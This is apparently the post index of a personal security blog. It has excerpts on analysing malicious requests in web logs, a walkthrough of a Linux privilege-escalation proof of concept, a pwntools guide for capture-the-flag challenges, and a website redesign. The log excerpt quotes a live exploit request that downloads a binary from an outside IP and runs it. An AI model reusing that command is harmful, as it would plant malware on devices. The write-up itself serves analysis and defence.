Posts

Intro I run a website1 and periodically I’ll go check my web logs for any fun or interesting entries. Most of the time it’s someone wasting EC2 credits running FFuF against the entire internet, but every once in a while there’ll be someone trying to exploit a known vulnerability to download some of their malware. These requests typically look like: 1 2 POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20sora.arm7%3B%20wget%20http%3A%2F%2F176.65.139.64%2Fbins%2Fsora.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fsora.arm7%20tbk HTTP/1.1 301 1031 "-" "Mozila/5.0" The core command is pretty standard. ...

Prelude CopyFail, also known as CVE-2026-31431, is a controlled 4-byte overwrite to the Linux page cache, effectively granting an unlimited write-anywhere-on-the-filesystem primitive that can easily be used for privilege escalation, among other things. The original disclosure was by Xint and can be found here. If you would like a more formal explanation on how this technique works, I would recommend reading the original article. This post serves as a walkthrough of how the PoC code works since I believe the code released by Xint was unnecessarily optimized and hard to immediately understand. This can probably be attributed to the claim that the payload is only “732 bytes” small, something they mention no less than five times, despite the fact that the payload could be much smaller (see below). ...

Note that this is a very uncomprehensive guide and merely serves as the greatest-common-denominator use case when I’m solving pwn challenges. As such, there is much that pwntools has to offer that I will not cover either for brevity or because I am not aware of them. That being said, I’ve broken this post down into four sections, the zeroth of which is a “preamble” that I use in all my scripts to set all the variables and initializes everything needed for the coming script. Sections one through three have some overlap but serve as slightly different setups for buffer overflow, format string, and shellcode vulnerabilities. ...

In 2020 I decided to make a website. It was COVID times and I, like so many others, decided to use their spare time to sit down and work on a skill that they’ve put off for the past few years. My entire experience (and scope for the project) was exclusively with raw HTML, CSS, and JavaScript. No frameworks, server-side processing, or even JQuery. Just bare-bones web development of the early 2000s. Safe to say, it was not the most appealing website, but it got the job done and I could officially say that I had my own website for the first time in my life. I lived with it and liked it for several years, until I finally realized that I should probably put something together that was more fitting of the modern age of web design. ...